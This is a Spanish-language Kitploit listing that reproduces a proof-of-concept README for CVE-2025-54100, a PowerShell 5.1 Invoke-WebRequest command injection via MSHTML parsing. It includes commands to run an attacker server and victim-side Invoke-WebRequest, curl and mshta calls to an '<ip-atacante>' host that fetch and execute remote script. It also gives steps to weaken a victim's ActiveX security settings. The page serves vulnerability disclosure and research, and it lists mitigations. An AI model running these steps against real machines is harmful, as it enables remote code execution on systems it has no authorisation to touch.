Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-54100 — CVE-2025-54100 (CVSS 7.8 Alto) es una vulnerabilidad de inyección de comandos en el cmdlet Invoke-WebRequest de Windows PowerShell 5.1. Surge de una neutralización incorrecta de elementos especiales durante el análisis automático de respuestas web. | Kitploit
Herramientas/GitHubGitHub/themehackers/cve-2025-54100
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubthemehackers/cve-2025-54100

CVE-2025-54100

CVE-2025-54100 (CVSS 7.8 Alto) es una vulnerabilidad de inyección de comandos en el cmdlet Invoke-WebRequest de Windows PowerShell 5.1. Surge de una neutralización incorrecta de elementos especiales durante el análisis automático de respuestas web.

Ver Repositorio
3174hace 9 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-54100 – PoC de Análisis de Respuesta de PowerShell

Un Proof-of-Concept conciso que muestra cómo CVE-2025-54100 puede conducir a la Ejecución Remota de Código (RCE) en Windows PowerShell 5.1 a través del análisis malicioso de HTML.

Tabla de Contenidos

  • ¿Qué es CVE-2025-54100?
  • Cómo Funciona el PoC
  • Inicio Rápido
  • Desencadenar Desde un Host Víctima
  • Solución de Problemas y Verificación
  • Evidencia
  • Mitigación
  • Descargo de Responsabilidad
  • Referencias

¿Qué es CVE-2025-54100?

  • Tipo: Inyección de comandos en Invoke-WebRequest cuando no se usa -UseBasicParsing
  • Gravedad: CVSS 7.8 (Alta)
  • Causa raíz: El análisis basado en MSHTML de respuestas HTML permite la ejecución de scripts (por ejemplo, ) en el contexto del llamante.
ActiveXObject
  • Afecta: Windows 10/11 y Windows Server 2008-2025 con PowerShell 5.1.
  • Cómo Funciona el PoC

    1. El servidor FastAPI en CVE-2025-54100.py sirve un payload HTML manipulado.
    2. El payload intenta instanciar objetos ActiveX WScript.Shell / Shell.Application.
    3. En hosts vulnerables, el analizador MSHTML ejecuta el script, demostrando RCE al lanzar calc.exe.
    4. El payload suministrado es intencionalmente mínimo y no destructivo, pero puede modificarse para investigación adicional.

    Inicio Rápido

    Requisitos previos

    • Python 3.10+ (probado con FastAPI y Uvicorn)
    • Instalar dependencias:
      root@kitploit:~
      python3 -m venv .venv
      source .venv/bin/activate
      pip3 install -r requirements.txt
      

    Ejecutar el servidor malicioso

    Inicie el servidor HTTP del PoC:

    root@kitploit:~
    uvicorn app:app --host 0.0.0.0  --port 8888 --reload
    

    Desencadenar Desde un Host Víctima

    Ejecute estos comandos en una máquina Windows vulnerable sin -UseBasicParsing:

    root@kitploit:~
    # Invoke-WebRequest
    Invoke-WebRequest -Uri "http://<ip-atacante>:8888"
    # alias curl
    curl http://<ip-atacante>:8888
    # mshta
    mshta http://<ip-atacante>:8888
    

    Use el mismo puerto que configuró para el servidor. Si es vulnerable, el script incrustado se ejecuta a través del analizador MSHTML. Algunos productos antivirus pueden bloquear el comportamiento aunque el problema de análisis esté presente.

    Solución de Problemas y Verificación

    Si calc.exe no aparece:

    1. Abra Opciones de Internet en la víctima.
    2. Vaya a Seguridad → Nivel personalizado...
    3. Habilite “Inicializar y ejecutar scripts de controles ActiveX no marcados como seguros para scripting.”
    4. Vuelva a ejecutar Invoke-WebRequest sin -UseBasicParsing.

    Esto demuestra el vector de ejecución. Los payloads del mundo real pueden usar ofuscación o bypass adicionales para evadir las restricciones predeterminadas.

    Evidencia

    PoC

    Mitigación

    Microsoft parcheó el problema en diciembre de 2025:

    1. Aplique las actualizaciones de seguridad en los hosts Windows afectados.
    2. Use -UseBasicParsing para evitar el análisis MSHTML:
      root@kitploit:~
      Invoke-WebRequest -Uri "http://<ip-atacante>:8888" -UseBasicParsing
      
    3. Migre a PowerShell 7+ (pwsh), que no depende de MSHTML para el análisis.

    Descargo de Responsabilidad

    [!WARNING] Solo para fines educativos y pruebas autorizadas. Úselo responsablemente y cumpla con todas las leyes aplicables. Los autores no se hacen responsables por el mal uso o daños.

    Referencias

    • NVD: CVE-2025-54100
    • MSRC: Guía de actualización
    • GitHub: osman1337-security/CVE-2025-54100
    Descargar herramienta